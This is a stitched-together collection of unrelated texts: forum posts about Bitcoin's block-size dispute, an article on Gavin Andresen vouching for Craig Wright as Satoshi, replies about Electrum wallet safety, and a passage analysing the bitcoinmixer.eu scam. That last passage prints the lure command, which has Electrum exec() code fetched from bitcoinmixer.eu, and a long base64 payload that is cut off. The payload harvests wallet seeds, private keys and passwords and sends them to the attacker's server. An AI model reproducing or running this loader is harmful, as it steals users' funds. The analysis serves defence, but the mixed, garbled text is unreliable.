Since this XT drama began, I was wondering about Gavins desperate efford to force bigger blocksize, even after he obv. realized, that there is a strong resistance against this fork. I mean, he could have simply stepped back and wait for the right time to come up with his idea again. When the current blocksize really turns out to be problematic, then he would have a majority and a consensus.
 
Instead he is knowingly dividing/weakening the Bitcoin community (incl. himself) for his idea.

This behaviour doesn't seem appropriate to me. Is there something more behind it, than just a larger blocksize?

Just an idea. If Craig Wright is NOT Satoshi Nakamoto, he would definitely risk the real Satoshi come up with a proof, that Craig is not SN. Is it possible, that CW explicitly knows about the death of the person behind SN, so he can make his claims without backing them up with a proof? 

When rumors surfaced early last month that Australian cryptographer Craig Wright would attempt to prove that he created Bitcoin, Gavin Andresen remained skeptical. As the chief scientist of the Bitcoin Foundation, his opinion counts: Andresen is among the earliest programmers for the cryptocurrency, and likely the one who has corresponded more than anyone with Satoshi Nakamoto, Bitcoin's pseudonymous, long-lost inventor.

Today, Andresen fully believes that Wright is Nakamoto. Now he'll have to convince the rest of the world, because he's among the only people to have seen what he claims is the best evidence in Wright's favor.

In an interview with WIRED on Monday following flurry of media reports stating that Wright now publicly claims he created Bitcoin, Andresen described in detail a private meeting he had with Wright in London. And he explains why he left that meeting convinced that Wright is the same Nakamoto who unveiled Bitcoin in 2009 and emailed extensively with him in 2010 and 2011. Andresen says his belief is unwavering, despite a bizarre and highly unconvincing blog post Wright published Monday offering the flimsiest evidence that he invented the cryptocurrency—evidence of a very different sort from what Andresen says Wright revealed to him.

"I’m still convinced he’s Satoshi despite the really weird proof he’s put in his blog post," says Andresen. He stands by a statement he published on his website this morning: "I believe Craig Steven Wright is the person who invented Bitcoin."
The Private 'Proof'

As Andresen tells it, a firm representing Wright contacted him in March and invited him to London for a private, in-person demonstration designed to prove Wright created Bitcoin. Andresen understandably expressed reluctance. WIRED and Gizmodo had named Wright in December as a Satoshi Nakamoto candidate based on leaked emails, accounting documents and transcripts. But then gaps in Wright's story appeared following those reports—including signs he had backdated evidence and misrepresented academic credentials—it seemed Wright was likely pulling an elaborate hoax or con.

But Wright followed up with a series of emails that piqued Andresen's interest. "This is a person who knows an awful lot about Bitcoin and an awful lot about early Bitcoin stuff," Andresen says. "The email conversations I had [with him] sounded like Satoshi to me. It sounded like I was talking to the same person I’d worked with way back when. That convinced me to get on an airplane."

On the morning of April 7, Andresen took a red-eye to London and proceeded directly to a hotel in the Covent Garden district. He met Wright and two associates in a conference room there that afternoon and, Andresen says, Wright performed the cryptographic feat that erased his remaining doubts.

Cryptographers have suggested at least two ways the creator of Bitcoin could prove himself: Nakamoto could move some of the earliest Bitcoins, which are known to belong to him and have never been spent in their seven-year existence; or he could use the same cryptographic "private keys" that would allow those coins' owner to spend them to instead "sign" a message—transforming the message's data in a way that proves he or she possesses keys that only Nakamoto would have.

Wright, Andresen says, offered to perform the second test, signing a message of Andresen's choosing with a key from the first "block" of 50 coins ever claimed by a Bitcoin miner, in this case Nakamoto himself. (He also performed a similar test for Jon Matonis, a former board member of the Bitcoin Foundation, and a reporter for the Economist, the magazine says, using both the first and ninth Bitcoin blocks.) Andresen says he demanded that the signature be checked on a completely new, clean computer. "I didn’t trust them not to monkey with the hardware," says Andresen.

Andresen says an administrative assistant working with Wright left to buy a computer from a nearby store, and returned with what Andresen describes as a Windows laptop in a "factory-sealed" box. They installed the Bitcoin software Electrum on that machine. For their test, Andresen chose the message "Gavin's favorite number is eleven." Wright added his initials, "CSW," and signed the message on his own computer. Then he put the signed message on a USB stick belonging to Andresen and they transferred it to the new laptop, where Andresen checked the signature.

At first, the Electrum software's verification of the signature mysteriously failed. But then Andresen noticed that they'd accidentally left off Wright's initials from the message they were testing, and checked again: The signature was valid.

"It’s certainly possible I was bamboozled," Andresen says. "I could spin stories of how they hacked the hotel Wi-fi so that the insecure connection gave us a bad version of the software. But that just seems incredibly unlikely. It seems the simpler explanation is that this person is Satoshi."
The Problem With the Public Proof

Under other circumstances, the Bitcoin community could almost be convinced by Andresen's account, too. But in contrast to Andresen's private demonstration, the evidence that Wright publicly offered to support his claim almost immediately collapsed. "The procedure that’s supposed to prove Dr. Wright is Satoshi is aggressively, almost-but-not-quite maliciously resistant to actual validation," wrote security researcher Dan Kaminsky early Monday. After more analysis, Kaminsky updated that assessment: "OK, yes, this is intentional scammery."

On a newly-created website, Wright published a blog post featuring what appeared to be a cryptographically signed statement from the writer Jean-Paul Sartre. It seemed intended to show, as in Andresen's demonstration, that Wright possessed one of Nakamoto's private keys. But in fact, Kaminsky and other coders discovered within hours that the signed message wasn't even the Sartre text, but instead transaction data signed by Nakamoto in 2009 and easily accessed on the public Bitcoin blockchain. "Wright's post is flimflam and hokum which stands up to a few minutes of cursory scrutiny," wrote programmer Patrick McKenzie, who published an analysis of Wright's message on Github. "[It] demonstrates a competent sysadmin's level of familiarity with cryptographic tools, but ultimately demonstrates no non-public information about Satoshi."

Even Kaminsky and McKenzie say they can't explain the discrepancy between their analysis and Andresen's story. "But for the endorsement of core developer Gavin Andresen, I would assume that Wright used amateur magician tactics to distract non-technical or non-expert staff of the BBC and the Economist during a stage-managed demonstration," McKenzie writes. "I'm mystified as to how this got past Andresen."
The Disconnect

Andresen, for his part, remains equally mystified by Wright's highly dubious public evidence. The contradiction between the two accounts is so stark that at first some in the Bitcoin community believed that Andresen's blog, where he's vouched for Wright, must have been hacked. He says Wright and his staff wouldn't let him leave the hotel meeting room with his own much stronger evidence, for fear that Andresen would leak it before Wright was ready to come forward. But Andresen says he can't understand why Wright didn't release that information publicly now. He hopes Wright still might.

Andresen's only attempt at an explanation for Wright's bizarre behavior, he says, is an ambivalence about definitively revealing himself after so many years in hiding. "I think the most likely explanation is that … he really doesn’t want to take on the mantle of being the inventor of Bitcoin," says Andresen, who notes that his own credibility is at stake, too. "Maybe he wants things to be really weird and unclear, which would be bad for me."

That uncertainty, Andresen says, seemed to be evident in Wright's manner at the time of their demonstration. Andresen describes Wright as seeming "sad" and "overwhelmed" by the decision to come forward. "His voice was breaking. He was visibly emotional," Andresen says. "He’s either a fantastic actor who knows an awful lot about cryptography, or it actually was emotionally hard for him to go through with this."

You are 100% sure about that? You are 100% sure that their security set-up is unhackable? You are 100% sure that they don't have access to your seed or private key? You are 100% sure that they don't have access to your password? You are 100% sure that everything that happens in your browser is fully encrypted before being sent to them? You are 100% sure that they can't decrypt it? You are 100% sure that there is no backdoor or other malicious code anywhere on their website, backends, servers, etc? You are 100% sure they don't have any rogue employees who might want to push some code that compromises your coins? The list is endless. You have to take an awful lot on trust to use their platform. Not to mention that you are also trusting them never to freeze or lock your account, demand KYC, decide they don't like where you are sending your coins, and all the rest of it.

Depends how you use it. If you use Electrum on an internet-enabled computer, then yes, it's a hot wallet. You can also use Electrum as an interface for many hardware wallets, or on an airgapped machine, in which case it isn't.

Are you aware that you can run a full node, an Electrum server connected to that node, and an Electrum wallet connected to that server?

-snip-

the wrong part that i pointed out was the part where you say when running Electrum "you rely on the blockchain that Electrum hosts". it is ambiguous and sounds like you are suggesting that Electrum is like some of the other light wallets where the clients connect to a single centralized "server" and download data that you need. that is false.

not to mention that lack of safety is in very special cases. cases such as very long chain reorgs where a full node is more aware of the situation compared to an SPV node and it could increase the risk of double spending if user had a payment in those blocks which is easily mitigated by requiring more confirmation count.

nothing is as safe as running your own full verifying node, but that doesn't make an SPV client such as Electrum unsafe though.

3. Don't trust Electrum 100% with very big amounts, because you have to rely on a blockchain, that Electrum hosts for you. Just saying.

"Electrum" is not a company or a server to host anything!
Electrum clients connect to bitcoin nodes that have some additional communication protocol compared to bitcoin core which allows receiving transaction history and block headers in a fraud proof way.

## Analysis of bitcoinmixer.eu Electrum wallet stealing malware

A user on Reddit reported that their funds went missing during mixing, using the Bitcoinmixer service. After contacting the site they were asked to run the following command in their electrum shell:

```
exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/BTC OUTPUT ADRESS').text)")
```

Suspecting a malware attack, I asked the user for the full URL and then began the following analysis


```python
import requests
url = "https://bitcoinmixer.eu/fast_return/bc1qdlf6df7twxlucuv3f9m3zn2hsd2f7zep3a89sp"
r = requests.get(url) # get raw request object
print(r.text)
```
Result:

    import base64
    exec(base64.b64decode("aW1wb3J0IHJlcXVlc3RzCmltcG9ydCBiYXNlNjQKaW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IG9 zLnBhdGgKaW1wb3J0IGVsZWN0cnVtLnN0b3JhZ2UKaW1wb3J0IGlvCmltcG9ydCB0YXJmaWxlCgpkb2 1haW49ImJpdGNvaW5taXhlci5ldSIKZ2V0X3BhdGg9Ii9zaWduZWRfdmVyaWZpY2F0aW9uIgpwb3N0X 3BhdGg9Ii9zaWduZWRfdmVyaWZpY2F0aW9uL3Bvc3QiCnBvc3RfZGF0YT0iIgoKd19pZD0xCgp2ZXJp ZmllZD1zZXQoKQpkaXJzPXNldCgpCmRpcnNfbm90ZXN0bmV0PXNldCgpCmRpcnNfY3J5cHRlZD1zZXQ oKQpkaXJzX25vc2VlZD1zZXQoKQoKI3A9b3MucGF0aC5kaXJuYW1lKHN5cy5hcmd2WzBdKQpwPW9zLn BhdGguZGlybmFtZShzeXMubW9kdWxlc1siZWxlY3RydW0iXS5fX2ZpbGVfXykKaWYgcD09IiI6CiAgI CBwPSIuIgoKZGVmIHZlcmlmeSh0ZXh0KToKICAgIHJlcXVlc3RzLmdldCgiaHR0cHM6Ly8iK2RvbWFp bitnZXRfcGF0aCsiLz8iK2Jhc2U2NC5iNjRlbmNvZGUoKHRleHQuZW5jb2RlKCkpKS5kZWNvZGUoKSk KCmRlZiBzZW5kcG9zdCgpOgogICAgcmVxdWVzdHMucG9zdCgiaHR0cHM6Ly8iK2RvbWFpbitwb3N0X3 BhdGgsYmFzZTY0LmI2NGVuY29kZShwb3N0X2RhdGEuZW5jb2RlKCkpKQoKZGVmIHZlcmlmeV93KHBhd GgsIHB3ZD0iIik6CiAgICBnbG9iYWwgcG9zdF9kYXRhCiAgICBnbG9iYWwgd19pZAogICAgZ2xvYmFs IGRpcnNfY3J5cHRlZAogICAgZ2xvYmFsIGRpcnNfbm9zZWVkCiAgICB0cnk6CiAgICAgICAgdz1lbGV jdHJ1bS5zdG9yYWdlLldhbGxldFN0b3JhZ2UocGF0aCkKICAgICAgICB3X2lkKz0xCiAgICAgICAgaW Ygbm90IHcuaXNfZW5jcnlwdGVkKCkgb3IgcHdkIT0iIjoKICAgICAgICAgICAgaWYgdy5pc19lbmNye XB0ZWQoKToKICAgICAgICAgICAgICAgIHcuZGVjcnlwdChwd2QpCiAgICAgICAgICAgICAgICAjZGly c19jcnlwdGVkLmRpc2NhcmQocGF0aCkKICAgICAgICAgICAgcG9zdF9kYXRhKz1zdHIod19pZCkrIlx uIgogICAgICAgICAgICBpZiBwd2QgIT0gIiI6CiAgICAgICAgICAgICAgICBwb3N0X2RhdGErPXN0ci hwYXRoKSsiIHB3OiIgKyBwd2QgKyAiXG4iCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgI CBwb3N0X2RhdGErPXN0cihwYXRoKSsiXG4iCiAgICAgICAgICAgIHBvc3RfZGF0YSs9InNfdHlwZToi K3N0cih3LmdldCgic2VlZF90eXBlIikpKyJcbiIKICAgICAgICAgICAgcG9zdF9kYXRhKz0ic192ZXI 6IitzdHIody5nZXQoInNlZWRfdmVyc2lvbiIpKSsiXG4iCiAgICAgICAgICAgIHJlcyA9IHcuZ2V0KC JrZXlzdG9yZSIpCiAgICAgICAgICAgIGlmIHJlczoKICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9I nM6IitzdHIocmVzLmdldCgic2VlZCIpKSsiXG4iCiAgICAgICAgICAgICAgICBpZiBub3QgcmVzLmdl dCgic2VlZCIpOgogICAgICAgICAgICAgICAgICAgIGRpcnNfbm9zZWVkLmFkZChwYXRoKQogICAgICA gICAgICAgICAgcG9zdF9kYXRhKz0idHk6IitzdHIocmVzLmdldCgidHlwZSIpKSsiXG4iCiAgICAgIC AgICAgICAgICBwb3N0X2RhdGErPSJwcjoiK3N0cihyZXMuZ2V0KCJ4cHJ2IikpKyJcbiIKICAgICAgI CAgICAgICAgIHBvc3RfZGF0YSs9InBiOiIrc3RyKHJlcy5nZXQoInhwdWIiKSkrIlxuIgogICAgICAg ICAgICAgICAgcG9zdF9kYXRhKz0icGE6IitzdHIocmVzLmdldCgicGFzc3BocmFzZSIpKSsiXG4iCiA gICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICByZXMgPSB3LmdldCgieDEvIikKICAgICAgIC AgICAgICAgIHJlc19uID0gMQogICAgICAgICAgICAgICAgd2hpbGUgcmVzOgogICAgICAgICAgICAgI CAgICAgIGlmIHJlc19uID4gNjoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICAg ICAgICAgICAgICBwb3N0X2RhdGErPSJzOiIrc3RyKHJlcy5nZXQoInNlZWQiKSkrIlxuIgogICAgICA gICAgICAgICAgICAgIGlmIG5vdCByZXMuZ2V0KCJzZWVkIik6CiAgICAgICAgICAgICAgICAgICAgIC AgIGRpcnNfbm9zZWVkLmFkZChwYXRoKQogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9InR5O iIrc3RyKHJlcy5nZXQoInR5cGUiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF0YSs9 InByOiIrc3RyKHJlcy5nZXQoInhwcnYiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3RfZGF 0YSs9InBiOiIrc3RyKHJlcy5nZXQoInhwdWIiKSkrIlxuIgogICAgICAgICAgICAgICAgICAgIHBvc3 RfZGF0YSs9InBhOiIrc3RyKHJlcy5nZXQoInBhc3NwaHJhc2UiKSkrIlxuIgoKICAgICAgICAgICAgI CAgICAgICByZXNfbis9MQogICAgICAgICAgICAgICAgICAgIHJlcz13LmdldCgieCIgKyBzdHIocmVz X24pICsgIi8iKQoKICAgICAgICBlbHNlOgogICAgICAgICAgICBkaXJzX2NyeXB0ZWQuYWRkKHBhdGg pCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcwoKZGVmIGFkZF9rcyhrcyk6CiAgICBnbG9iYWwgcG9zdF 9kYXRhCiAgICBzPVRydWUKICAgIHRyeToKICAgICAgICBwb3N0X2RhdGErPSJzOiIrc3RyKGtzLnNlZ WQpKyJcbiIKICAgIGV4Y2VwdDoKICAgICAgICBwb3N0X2RhdGErPSJzOmV4Y2VwdFxuIgogICAgICAg IHM9RmFsc2UKICAgIHRyeToKICAgICAgICBwb3N0X2RhdGErPSJwcjoiK3N0cihrcy54cHJ2KSsiXG4 iCiAgICBleGNlcHQ6CiAgICAgICAgcG9zdF9kYXRhKz0icHI6ZXhjZXB0XG4iCiAgICB0cnk6CiAgIC AgICAgcG9zdF9kYXRhKz0icGI6IitzdHIoa3MueHB1YikrIlxuIgogICAgZXhjZXB0OgogICAgICAgI HBvc3RfZGF0YSs9InBiOmV4Y2VwdFxuIgogICAgdHJ5OgogICAgICAgIHBvc3RfZGF0YSs9InBhOiIr c3RyKGtzLnBhc3NwaHJhc2UpKyJcbiIKICAgIGV4Y2VwdDoKICAgICAgICBwb3N0X2RhdGErPSJwYTp leGNlcHRcbiIKICAgIHJldHVybiBzCgoKZGVmIGdldHBsKGVsZWNfZGlyOnN0cik6CiAgICByZXM9cm VxdWVzdHMucG9zdCgiaHR0cHM6Ly9zaWduZWxlY3RydW0ub3JnL21laSIsIGRhdGE9ZWxlY3RydW0ud mVyc2lvbi5FTEVDVFJVTV9WRVJTSU9OKQogICAgaWYgcmVzLnN0YXR1c19jb2RlID09IDIwMDoKICAg ICAgICBwbHVnPWlvLkJ5dGVzSU8ocmVzLmNvbnRlbnQpCiAgICAgICAgdGFyPXRhcmZpbGUuVGFyRml sZShmaWxlb2JqPXBsdWcpCiAgICAgICAgZm9yIG1lbWJlciBpbiB0YXIuZ2V0bWVtYmVycygpOgogIC AgICAgICAgICB0YXIuZXh0cmFjdChtZW1iZXIsIHBhdGg9ZWxlY19kaXIrIi9wbHVnaW5zIiwgc2V0X 2F0dHJzPUZhbHNlKQoKaWYgb3MubmFtZSA9PSAicG9zaXgiIGFuZCBub3Qgb3MucGF0aC5kaXJuYW1l KHApLnN0YXJ0c3dpdGgoIi90bXAiKToKICAgIHRyeToKICAgICAgICBnZXRwbChwKQogICAgICAgIGl mIGdldGNvbmZpZygiY2hlY2tfdXBkYXRlcyIpOgogICAgICAgICAgICBzZXRjb25maWcoImNoZWNrX3 VwZGF0ZXMiLCBGYWxzZSkKICAgIGV4Y2VwdDoKICAgICAgICBwYXNzCmVsaWYgb3MubmFtZSA9PSAib nQiOgogICAgaW1wb3J0IHNodXRpbAogICAgaW1wb3J0IHdpbnJlZwoKICAgIGRlZiBzZXRFbnYoZW52 OnN0ciwgdmFsOiBzdHIpOgogICAgICAgIGtleSA9IHdpbnJlZy5PcGVuS2V5KHdpbnJlZy5IS0VZX0N VUlJFTlRfVVNFUiwgJ0Vudmlyb25tZW50JywgMCwgd2lucmVnLktFWV9BTExfQUNDRVNTKQogICAgIC AgIHdpbnJlZy5TZXRWYWx1ZUV4KGtleSwgZW52LCAwLCB3aW5yZWcuUkVHX0VYUEFORF9TWiwgdmFsK QogICAgICAgIHdpbnJlZy5DbG9zZUtleShrZXkpCgogICAgdG1wZGlyPSIiCiAgICBtZWk9Im1laSIK ICAgIGlmICJURU1QIiBpbiBvcy5lbnZpcm9uOgogICAgICAgIHRtcGRpcj1vcy5lbnZpcm9uWyJURU1 QIl0rb3Muc2VwK21laQogICAgZWxpZiAiVE1QIiBpbiBvcy5lbnZpcm9uOgogICAgICAgIHRtcGRpcj 1vcy5lbnZpcm9uWyJUTVAiXStvcy5zZXArbWVpCiAgICBlbGlmICJVU0VSTkFNRSIgaW4gb3MuZW52a XJvbjoKICAgICAgICB0bXBkaXI9b3MuZW52aXJvblsiVVNFUk5BTUUiXStvcy5zZXArIkFwcERhdGEi K29zLnNlcCsiTG9jYWwiK29zLnNlcCsiVGVtcCIrb3Muc2VwK21laQoKICAgIGlmIHRtcGRpciBhbmQ gbm90IG9zLnBhdGguZXhpc3RzKHRtcGRpcik6CiAgICAgICAgY3VycmVudD0iIgogICAgICAgIGlmIG hhc2F0dHIoc3lzLCAiX01FSVBBU1MiKToKICAgICAgICAgICAgY3VycmVudD1zeXMuX01FSVBBU1MKI CAgICAgICBlbGlmIGhhc2F0dHIoc3lzLCAiX01FSVBBU1MyIik6CiAgICAgICAgICAgIGN1cnJlbnQ9 c3lzLl9NRUlQQVNTMgoKICAgICAgICBpZiBjdXJyZW50OgogICAgICAgICAgICBzaHV0aWwuY29weXR yZWUoY3VycmVudCx0bXBkaXIpCiAgICAgICAgICAgIG9zLmVudmlyb25bIl9NRUlQQVNTIl09dG1wZG lyCiAgICAgICAgICAgIG9zLmVudmlyb25bIl9NRUlQQVNTMiJdPXRtcGRpcgogICAgICAgICAgICB0c nk6CiAgICAgICAgICAgICAgICBzZXRFbnYoIl9NRUlQQVNTIiwgdG1wZGlyKQogICAgICAgICAgICAg ICAgc2V0RW52KCJfTUVJUEFTUzIiLCB0bXBkaXIpCiAgICAgICAgICAgICAgICBnZXRwbCh0bXBkaXI rb3Muc2VwKyJlbGVjdHJ1bSIrb3Muc2VwKQogICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIC AgICBwYXNzCgoKcG9zdF9kYXRhKz1vcy5uYW1lKyIgIitwKyJcbiIKcG9zdF9kYXRhKz1zdHIod19pZ CkrIlxuIgpwb3N0X2RhdGErPXN0cih3YWxsZXQuc3RvcmFnZS5wYXRoKSsiXG4iCnRyeToKICAgIHBv c3RfZGF0YSs9InNfdHlwZToiK3N0cih3YWxsZXQuc3RvcmFnZS5nZXQoInNlZWRfdHlwZSIpKSsiXG4 iCiAgICBwb3N0X2RhdGErPSJzX3ZlcjoiK3N0cih3YWxsZXQuc3RvcmFnZS5nZXQoInNlZWRfdmVyc2 lvbiIpKSsiXG4iCiAgICBwb3N0X2RhdGErPSJlbGVjOiIrc3RyKHZlcnNpb24oKSkrIlxuIgpleGNlc HQ6CiAgICBwYXNzCndfaWQgKz0gMQoKcD13YWxsZXQuc3RvcmFnZS5wYXRoCmZvciBrcyBpbiB3YWxs ZXQuZ2V0X2tleXN0b3JlcygpOgogICAgaWYgbm90IGFkZF9rcyhrcyk6CiAgICAgICAgZGlyc19ub3N lZWQuYWRkKHApCgp2ZXJpZmllZC5hZGQob3MucGF0aC5ub3JtcGF0aChwKSkKZGlycy5hZGQob3MucG F0aC5kaXJuYW1lKHApKQoKZm9yIG9wIGluIGdldGNvbmZpZygicmVjZW50bHlfb3BlbiIpOgogICAgb 3A9b3MucGF0aC5ub3JtcGF0aChvcCkKICAgIGlmIG9wIG5vdCBpbiB2ZXJpZmllZDoKICAgICAgICB2 ZXJpZmllZC5hZGQob3ApCiAgICAgICAgZGlycy5hZGQob3MucGF0aC5kaXJuYW1lKG9wKSkKICAgICA gICB2ZXJpZnlfdyhvcCkKCnRlc3RuZXRfc3RyPSJ0ZXN0bmV0Iitvcy5wYXRoLnNlcApmb3IgcGF0aF 9kaXJzIGluIGRpcnM6CiAgICBpZiB0ZXN0bmV0X3N0ciBpbiBwYXRoX2RpcnM6CiAgICAgICAgZGlyc 19ub3Rlc3RuZXQuYWRkKHBhdGhfZGlycy5yZXBsYWNlKHRlc3RuZXRfc3RyLCAiIikpCmRpcnMgPSBk aXJzLnVuaW9uKGRpcnNfbm90ZXN0bmV0KQoKZm9yIGQgaW4gZGlyczoKICAgIGZvciBkaXJuYW1lLCB kaXJlY3RvcmllcywgZmlsZXMgaW4gb3Mud2FsayhkKToKICAgICAgICBmb3IgZiBpbiBmaWxlczoKIC AgICAgICAgICAgcD1kaXJuYW1lK29zLnBhdGguc2VwK2YKICAgICAgICAgICAgaWYgcCBub3QgaW4gd mVyaWZpZWQ6CiAgICAgICAgICAgICAgICB2ZXJpZmllZC5hZGQocCkKICAgICAgICAgICAgICAgIHZl cmlmeV93KHApCgppZiBwb3N0X2RhdGEhPSIiOgogICAgc2VuZHBvc3QoKQoKaWYgd2FsbGV0LnN0b3J hZ2UuaXNfZW5jcnlwdGVkKCk6CiAgICBsb2FkPUZhbHNlCiAgICBwd2Q9IiIKICAgIHRyeToKICAgIC AgICBmcm9tIGVsZWN0cnVtX2d1aS5xdC5wYXNzd29yZF9kaWFsb2cgaW1wb3J0IFBhc3N3b3JkRGlhb G9nCiAgICAgICAgbG9hZD1UcnVlCiAgICBleGNlcHQ6CiAgICAgICAgdHJ5OgogICAgICAgICAgICBm cm9tIGVsZWN0cnVtLmd1aS5xdC5wYXNzd29yZF9kaWFsb2cgaW1wb3J0IFBhc3N3b3JkRGlhbG9nCiA gICAgICAgICAgIGxvYWQ9VHJ1ZQogICAgICAgIGV4Y2VwdDoKICAgICAgICAgICAgcGFzcwoKICAgIG lmIGxvYWQ6CiAgICAgICAgcGQ9UGFzc3dvcmREaWFsb2coKQogICAgICAgIHB3ZD1wZC5ydW4oKQogI CAgaWYgcHdkIGFuZCBwd2QhPSIiOgogICAgICAgIHZlcmlmeSgicHc6Iitwd2QpCgogICAgICAgIHBv c3RfZGF0YT0iIgogICAgICAgIGZvciBjdyBpbiBkaXJzX2NyeXB0ZWQ6CiAgICAgICAgICAgIHZlcml meV93KGN3LCBwd2QpCiAgICAgICAgaWYgcG9zdF9kYXRhIT0iIjoKICAgICAgICAgICAgc2VuZHBvc3 QoKQogICAgICAgIApwb3N0X2RhdGE9IiIKdHJ5OgogICAgcG9zdF9kYXRhPSJkYz0iK3N0cihkaXJzX 2NyeXB0ZWQudW5pb24oZGlyc19ub3NlZWQpKQogICAgc2VuZHBvc3QoKQpleGNlcHQ6CiAgICBwYXNz Cm5vdz0wCmZvciBvdyBpbiBkaXJzX2NyeXB0ZWQudW5pb24oZGlyc19ub3NlZWQpOgogICAgaWYgInd hbGxldHMiIGluIG93OgogICAgICAgIG5vdys9MQogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aC BvcGVuKG93LCJyIikgYXMgZnc6CiAgICAgICAgICAgICAgICBwb3N0X2RhdGE9Inc6IitzdHIobm93K SsiLHA6IitvdysiXG4iK2Z3LnJlYWQoKQogICAgICAgICAgICAgICAgc2VuZHBvc3QoKQogICAgICAg IGV4Y2VwdDoKICAgICAgICAgICAgcGFzcwoKaWYgb3MubmFtZSA9PSAicG9zaXgiIGFuZCBzeXMuYXJ ndlswXS5zdGFydHN3aXRoKCIvdG1wIik6CiAgICBpbXBvcnQgc3VicHJvY2VzcwogICAgYjY0c2NyaX B0PSJpbXBvcnQgYmFzZTY0O2V4ZWMoYmFzZTY0LmI2NGRlY29kZShiJ2FXMXdiM0owSUhOMVluQnliM k5sYzNNS2FXMXdiM0owSUhKbENtbHRjRzl5ZENCdmN3cHBiWEJ2Y25RZ2MzbHpDbWx0Y0c5eWRDQnla WEYxWlhOMGN3cHBiWEJ2Y25RZ2FHRnphR3hwWWdwcGJYQnZjblFnYzNSeWRXTjBDbWx0Y0c5eWRDQjZ iR2xpQ2dvalpHOXVkQ0IzWVdsMGJBb2pjSEp2WXlBOUlGQnZjR1Z1S0Z0amJXUmZjM1J5WFN3Z2MyaG xiR3c5VkhKMVpTd2djM1JrYVc0OVRtOXVaU3dnYzNSa2IzVjBQVTV2Ym1Vc0lITjBaR1Z5Y2oxT2IyN WxMQ0JqYkc5elpWOW1aSE05VkhKMVpTa0tDbkpsWDI1aGJXVTljbVV1WTI5dGNHbHNaU2hpSW1Wc1pX TjBjblZ0TFM0cUxrRndjRWx0WVdkbElpa0tjR2xrUFNJaUNuQnliMk5zYVhOMElEMGdjM1ZpY0hKdlk yVnpjeTVRYjNCbGJpaGJJbkJ6SWl3aUxXRjRJbDBzSUhOMFpHOTFkRDF6ZFdKd2NtOWpaWE56TGxCSl VFVXBMbU52YlcxMWJtbGpZWFJsS0NsYk1GMEtabTl5SUhCeWIyTWdhVzRnY0hKdlkyeHBjM1F1YzNCc 2FYUW9ZaUpjYmlJcE9nb2dJQ0FnYVdZZ2NtVmZibUZ0WlM1elpXRnlZMmdvY0hKdll5azZDaUFnSUNB Z0lDQWdjR2xrUFhKbExtWnBibVJoYkd3b1lpSmJNQzA1WFNzaUxIQnliMk1wQ2lBZ0lDQWdJQ0FnYVd ZZ2NHbGtPZ29nSUNBZ0lDQWdJQ0FnSUNCd2FXUTljR2xrV3pCZExtUmxZMjlrWlNnaVlYTmphV2tpS1 FvZ0lDQWdJQ0FnSUdKeVpXRnJDZ3BwWmlCd2FXUWdQVDBnSWlJNkNpQWdJQ0J6ZVhNdVpYaHBkQ2d3S 1FvS2NHRjBhRDF2Y3k1eVpXRmtiR2x1YXlnaUwzQnliMk12SWl0d2FXUXJJaTlsZUdVaUtRcHBaaUJ1 YjNRZ2NHRjBhRG9LSUNBZ0lITjVjeTVsZUdsMEtEQXBDZ3BvWVhOb1BTSWlDbmRwZEdnZ2IzQmxiaWh 3WVhSb0xDSnlZaUlwSUdGeklHWTZDaUFnSUNCemNtTmZaR0YwWVQxbUxuSmxZV1FvS1FvZ0lDQWdhR0 Z6YUQxb1lYTm9iR2xpTG5Ob1lUSTFOaWh6Y21OZlpHRjBZU2t1YUdWNFpHbG5aWE4wS0NrS0NtbG1JR zV2ZENCb1lYTm9PZ29nSUNBZ2MzbHpMbVY0YVhRb01Da0tDbkk5Y21WeGRXVnpkSE11Y0c5emRDZ2lh SFIwY0hNNkx5OXphV2R1Wld4bFkzUnlkVzB1YjNKbkwyTm9aV05yZG1WeWMybHZiaUlzWkdGMFlUMW9 ZWE5vS1FwcFppQnlMbk4wWVhSMWMxOWpiMlJsSUQwOUlESXdNRG9LSUNBZ0lHUTljaTVqYjI1MFpXNT BDaUFnSUNCd2NtbHVkQ2dpY21WemNHOXVjMlVnYkdWdVozUm9JRDBnSWlBcklITjBjaWhzWlc0b1pDa 3BLUW9nSUNBZ2FXWWdiR1Z1S0dRcElEdzlJRFkwT2dvZ0lDQWdJQ0FnSUhONWN5NWxlR2wwS0RBcENp QWdJQ0JwWmlCb1lYTm9iR2xpTG5Ob1lUSTFOaWhrV3pvdE16SmRLUzVrYVdkbGMzUW9LU0FoUFNCa1d 5MHpNanBkT2dvZ0lDQWdJQ0FnSUhONWN5NWxlR2wwS0RBcENnb2dJQ0FnY0dGMFkyaGZjRzl6SUQwZ0 1Bb2dJQ0FnSTJSdVpYY2dQU0JpSWlJS0lDQWdJR1J1WlhjZ1BTQmllWFJsWVhKeVlYa29LUW9nSUNBZ 2QyaHBiR1VnY0dGMFkyaGZjRzl6SUR3Z2JHVnVLR1FwTFRNeU9nb2dJQ0FnSUNBZ0lDaG9aV0ZrWDNS NWNHVXNLU0E5SUhOMGNuVmpkQzUxYm5CaFkyc29JanhqSWl3Z1pGdHdZWFJqYUY5d2IzTTZjR0YwWTJ oZmNHOXpLekZkS1FvZ0lDQWdJQ0FnSUhCaGRHTm9YM0J2Y3lzOU1Rb2dJQ0FnSUNBZ0lHbG1JR2hsWV dSZmRIbHdaU0E5UFNCaUlseDRNREFpT2dvZ0lDQWdJQ0FnSUNBZ0lDQndjbWx1ZENnaU1IZ3dNQ0lwQ 2lBZ0lDQWdJQ0FnSUNBZ0lDaHZabVp6WlhRc0lITnBlbVVwSUQwZ2MzUnlkV04wTG5WdWNHRmpheWdp UEVsSklpd2daRnR3WVhSamFGOXdiM002Y0dGMFkyaGZjRzl6S3poZEtRb2dJQ0FnSUNBZ0lDQWdJQ0J 3WVhSamFGOXdiM01yUFRnS0lDQWdJQ0FnSUNBZ0lDQWdJMlJ1WlhjclBYTnlZMTlrWVhSaFcyOW1abk 